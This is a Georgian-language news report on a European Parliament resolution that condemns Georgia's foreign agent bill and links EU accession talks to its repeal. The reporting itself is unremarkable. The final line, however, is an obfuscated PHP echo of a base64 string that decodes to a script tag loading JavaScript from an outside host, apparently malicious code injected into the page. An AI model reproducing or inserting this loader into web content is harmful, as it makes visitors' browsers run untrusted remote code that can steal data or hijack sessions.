celsiusi
ავერსი შნაიდერი

ევროპარლამენტმა 425 ხმით 25-ის წინააღმდეგ მიიღო რეზოლუცია „საქართველოში უცხოური აგენტის კანონის აღდგენის მცდელობისა და სამოქალაქო საზოგადოების შეზღუდვების შესახებ“.

ევროპარლამენტის თანახმად, საქართველოსთან ევროკავშირში გაწევრიანების მოლაპარაკებები არ უნდა გაიხსნას მანამ, სანამ „აგენტების კანონი“ მისი სამართლებრივი წესრიგის ნაწილი იქნება. ევროპარლამენტი მოუწოდებს ევროკომისიას, მოამზადოს შუალედური შეფასება საქართველოს მიერ 9 ნაბიჯის შესრულებასთან დაკავშირებით.

ამასთან, ევროპარლამენტარებმა მხარი დაუჭირეს ერთობლივი რეზოლუციის პროექტში შესწორებებს, რომელიც ითვალისწინებს ბიძინა ივანიშვილის სანქცირებას და საქართველოსთან უვიზო მიმოსვლის  რეჟიმის შესაძლო გადახედვას.

რეზოლუციაში ნათქვამია, რომ საქართველოში ინიციირებული კანონპროექტი არღვევს ევროკომისიის 9 რეკომენდაციიდან ორს — სამოქალაქო საზოგადოების თავისუფლად მუშაობის უზრუნველყოფას, მათ ჩართულობას გადაწყვეტილებების მიღების პროცესში (ნაბიჯი #9) და ევროკავშირისა და მისი ღირებულებების შესახებ დეზინფორმაციასთან ბრძოლას (ნაბიჯი #1).

ევროპარლამენტარების შეფასებით, უცხოური დაფინანსების მიმღები არასამთავრობო ორგანიზაციების გამჭვირვალობის უზრუნველყოფის ლეგიტიმური მიზანი ვერ ამართლებს ზომებს, რომლებიც ზღუდავს მათ საქმიანობას, განსაკუთრებით დემოკრატიის, კანონის უზენაესობისა და ადამიანის უფლებების სფეროში.

„კანონპროექტი შემოთავაზებულია საქართველოში სამოქალაქო საზოგადოებისა და დამოუკიდებელი მედიის წინააღმდეგ მზარდი თავდასხმების დროს; ასევე, საერთაშორისო დონორების მხრიდან დემოკრატიის მხარდაჭერის წინააღმდეგ, რისი მიზანიც სამოქალაქო სივრცის შევიწროება და საჯარო სფეროში კრიტიკული ხმების გაჩუმებაა. ეს კანონპროექტი ბოლოა საქართველოს მთავრობის წინასაარჩევნო საკანონმდებლო და სხვა ინიციატივების სერიიდან, რომელიც ასევე მოიცავს საკონსტიტუციო ცვლილებებს „ლგბტ პროპაგანდასთან“ საბრძოლველად და გენდერული კვოტების გაუქმებას პარლამენტის მიერ, რაც საფრთხეს უქმნის დემოკრატიულ რეფორმებს და ხელს უწყობს დეზინფორმაციის გავრცელებას ევროკავშირის, მისი ღირებულებებისა და პოლიტიკის შესახებ“, — ნათქვამია რეზოლუციის პროექტში.

რეზოლუციით ევროპარლამენტი:

  1. კატეგორიულად გმობს „უცხოური გავლენის გამჭვირვალობის შესახებ“ საკამათო კანონპროექტის შემობრუნებას, რომელიც სამოქალაქო საზოგადოებასა და დამოუკიდებელ მედიას თავისუფლად მოქმედების შესაძლებლობას უზღუდავს;
  2. ხაზს უსვამს, რომ კანონპროექტი შეუთავსებელია ევროკავშირის ღირებულებებთან და დემოკრატიულ პრინციპებთან, ეწინააღმდეგება საქართველოს ევროკავშირში გაწევრიანების ამბიციებს, ზიანს აყენებს საქართველოს საერთაშორისო რეპუტაციას და საფრთხეს უქმნის ქვეყნის ევროატლანტიკურ ინტეგრაციას;
  3. ხაზს უსვამს, რომ ევროკავშირში გაწევრიანების მოლაპარაკებები არ უნდა გაიხსნას მანამ, სანამ ეს კანონი საქართველოს სამართლებრივი წესრიგის ნაწილია;
  4. დაჟინებით მოუწოდებს საქართველოს პარლამენტს, შეწყვიტოს კანონპროექტის მიღება, მთავრობას კი— შეასრულოს 2023 წლის მარტში აღებული ვალდებულება კანონპროექტის უპირობოდ გაწვევის შესახებ. ასევე, მოუწოდებს საქართველოს მთავრობას, თავი შეიკავოს შემდგომი საკანონმდებლო წინადადებებისაგან, რომლებიც ეწინააღმდეგება დემოკრატიის, კანონის უზენაესობის, ადამიანის უფლებებსა და ძირითად თავისუფლებებს, შესაბამისად კი —ევროკავშირის წევრობის (კოპენჰაგენის) კრიტერიუმებს;
  5. ხაზს უსვამს, რომ კანონპროექტი ღალატობს ქართველი ხალხის უმრავლესობის მისწრაფებებს, იცხოვროს დემოკრატიულ საზოგადოებაში, გააგრძელოს დემოკრატიული და მართლმსაჯულების რეფორმები, მჭიდროდ ითანამშრომლოს ევროატლანტიკურ პარტნიორებთან და ევროკავშირში გაწევრიანების გზაზე;
  6. ხაზს უსვამს, რომ გამოხატვისა და შეკრების თავისუფლებისა და მშვიდობიანი პროტესტის უფლება არის ფუნდამენტური თავისუფლებები და დაცული უნდა იყოს ნებისმიერ ვითარებაში, განსაკუთრებით ქვეყანაში, რომელსაც სურს ევროკავშირში გაწევრიანება;
  7. მოუწოდებს მთავრობას, პატივი სცეს საქართველოს მოქალაქეების კონსტიტუციურ უფლებებს და, შესაბამისად, გამოთქვამს შეშფოთებას სპეცრაზმის მიერ კანონპროექტის მოწინააღმდეგე დემონსტრანტებისადმი არაპროპორციული ძალის გამოყენების შესახებ ცნობების გამო; მოუწოდებს საქართველოს ხელისუფლებას, გამოიძიოს და პასუხისგებაში მისცეს ისინი, ვინც პასუხისმგებელია ძალის უკანონო და არაპროპორციულ გამოყენებაზე;
  8. ხაზს უსვამს, რომ საზოგადოებრივი დამკვირვებლის როლი, რომელსაც ახორციელებს სამოქალაქო საზოგადოება და დამოუკიდებელი მედია, არსებითია დემოკრატიული საზოგადოებისთვის და გადამწყვეტია ევროკავშირში გაწევრიანებასთან დაკავშირებული რეფორმების წინსვლისთვის. მოუწოდებს საქართველოს ხელისუფლებას, ყველაფერი გააკეთოს იმისთვის, რომ უზრუნველყოს ხელსაყრელი გარემო სამოქალაქო საზოგადოებისა და დამოუკიდებელი მედიის განვითარებისთვის;
  9. გმობს იმ ფაქტს, რომ საქართველოს მთავრობა შთაგონებას იღებს ძალიან საკამათო მსგავსი რუსული კანონმდებლობისგან, რომელიც ასევე გამოიყენება უკრაინის წინააღმდეგ რუსეთის აგრესიული ომის ოპონენტთა ხმების ჩასახშობად;
  10. იხსენებს, რომ 2023 წლის 14 და 15 დეკემბრის ევროპულმა საბჭომ საქართველოს მიანიჭა კანდიდატის სტატუსი იმ პირობით, რომ გადაიდგმებოდა შესაბამისი ნაბიჯები, რომლებიც მითითებულია კომისიის 2023 წლის 8 ნოემბრის რეკომენდაციაში;
  11. შეახსენებს საქართველოს მთავრობას ევროკავშირში გაწევრიანების განაცხადისას აღებული ვალდებულებების შესახებ და მოუწოდებს, იგივე გააკეთონ ევროკომისიის პრეზიდენტმა, ვიცე-პრეზიდენტმა და კომისარმა გაფართოების საკითხებში;
  12. იწვევს კომისიას, წარადგინოს საქართველოს პროგრესის შუალედური შეფასება 2023 წლის 8 ნოემბრის კომისიის რეკომენდაციაში მითითებული ცხრა ნაბიჯის განხორციელებასთან დაკავშირებით;
  13. მოუწოდებს კომისიას და წევრ სახელმწიფოებს, შეაფასონ ამ კანონპროექტის გავლენა ევროკავშირის, როგორც დონორის როლზე საქართველოში და მკაფიოდ განუმარტონ საქართველოს მთავრობასა და პარლამენტს, თუ რა შესაძლო შედეგები შეიძლება მოჰყვეს კანონპროექტის მიღებას ევროკავშირის დაფინანსებაზე.
  14. მოუწოდებს საქართველოს მთავრობას, დაუბრუნდეს თავის ევროპულ გზას და რეალურად უზრუნველყოს კანდიდატის სტატუსისა და ევროკავშირში გაწევრიანების პირობების სრულად განხორციელება;
  15. იმეორებს ურყევ მხარდაჭერას ქართველი ხალხის ლეგიტიმური ევროპული მისწრაფებებისადმი და მისი სურვილისადმი, იცხოვროს აყვავებულ, კორუფციისგან თავისუფალ ქვეყანაში, რომელიც პატივს სცემს ფუნდამენტურ თავისუფლებებს, უზრუნველყოფს ღია საზოგადოებასა და დამოუკიდებელ მედიას; ხაზს უსვამს, რომ საქართველოსთვის კანდიდატის სტატუსის მინიჭება მოტივირებული იყო სამოქალაქო საზოგადოების მიღწევებისა და დემოკრატიული ძალისხმევის, ასევე, ევროკავშირში გაწევრიანებისადმი მოქალაქეების აბსოლუტური მხარდაჭერის აღიარების სურვილით;
  16. მოუწოდებს, უზრუნველყოფილ იქნას ეუთო/ოდირის მიუკერძოებელი და დამოუკიდებელი, გრძელვადიანი საერთაშორისო მისია 2024 წლის ოქტომბრის საპარლამენტო არჩევნებზე დასაკვირვებლად;

რეზოლუციაში შეტანილი შესწორებებით, ევროპარლამენტი:

  • გმობს საქართველოს ერთადერთი ოლიგარქის ბიძინა ივანიშვილის პირად როლს მიმდინარე პოლიტიკურ კრიზისში და დასავლეთზე ორიენტირებული კურსის რუსეთისკენ შებრუნების სასარგებლოდ; იმეორებს თავის მოწოდებას საბჭოსა და ევროკავშირის დემოკრატიულ პარტნიორებისადმი, განიხილონ ივანიშვილისთვის პირადი სანქციების დაწესება საქართველოში პოლიტიკური პროცესის გაუარესებაში მისი როლისა და მისი ხალხის ინტერესების საწინააღმდეგოდ მუშაობისთვის;
  • იმეორებს თავის მოწოდებას საქართველოს ხელისუფლებისადმი, გაათავისუფლოს ყოფილი პრეზიდენტი მიხეილ სააკაშვილი ჰუმანიტარული ნიშნით და დაუშვას მას საზღვარგარეთ სათანადო მკურნალობა; ხაზს უსვამს, რომ მისი საქმე კიდევ უფრო ხაზს უსვამს მართლმსაჯულების სისტემის ნამდვილი რეფორმის განხორციელების მნიშვნელობას;
  • მოუწოდებს კომისიას, დროულად შეაფასოს საქართველოს მიერ დაგეგმილი „უცხოელი აგენტის“ კანონის გავლენა საქართველოს მიერ ვიზალიბერალიზაციის კრიტერიუმების უწყვეტ შესრულებაზე, კერძოდ, ფუნდამენტური უფლებების ნიშნულის შესრულებაში, რაც ევროკავშირის ვიზალიბერალიზაციის პოლიტიკის გადამწყვეტი კომპონენტია;
  • მოუწოდებს „ქართული ოცნების“ უმრავლესობას, გააუქმოს შემოთავაზებული საკონსტიტუციო კანონმდებლობა, რომელიც ზღუდავს ლგბტიქ უფლებებს, რაც წარმოადგენს თავდასხმას არა მხოლოდ ლგბტიქ თემზე, არამედ სიტყვის თავისუფლებაზე და თავისუფალ სამოქალაქო საზოგადოებაზე.

წყარო: ნეტგაზეთი 

167
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");